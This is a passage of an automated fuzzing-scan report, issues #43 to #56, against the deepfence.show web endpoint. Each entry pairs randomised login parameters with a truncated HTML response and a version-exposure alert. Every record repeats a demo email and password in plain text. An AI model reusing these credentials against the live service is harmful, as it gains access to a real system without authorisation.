parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #43\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io9Ka0hnAUe5vg2m\nDemoUser1# 5WdaFc\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #44\nScan Fuzzing ScanSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUPzenRhgbAiNHI\nDemoUser1# dXt8viT\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #45\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioS75ZJ\nDemoUser1# JbPa5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #46\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io3aRjErKBdU\nDemoUser1# AXAjLV8TlILvfh\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#provoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #47\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioDsBuEFX\nDemoUser1# dc8HonvW7PFk\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #48\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioADOPKDemoUser1# QMD3zr0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #49\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iofZn4V\nDemoUser1# rF1ZHNDOq0Ycn08\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #50\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioFUbb7jH8\nDemoUser1# 3wjKlV\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #51\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioYCZBJgMZyN\nDemoUser1# TgOrbuW2rM1L\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #52\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioMokVIGpp0WSPf\nDemoUser1# FTvYm23qX4V8Yc\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #53\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioKcWrY\nDemoUser1# Afk2Q\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #54Scan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iozAR1httq\nDemoUser1# fwJsb1e\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #55\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iogYjlt\nDemoUser1# LULglWNeeiaD\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #56\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioMhZZfDM\nDemoUser1# gO7z8iBWiTH1czn\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token 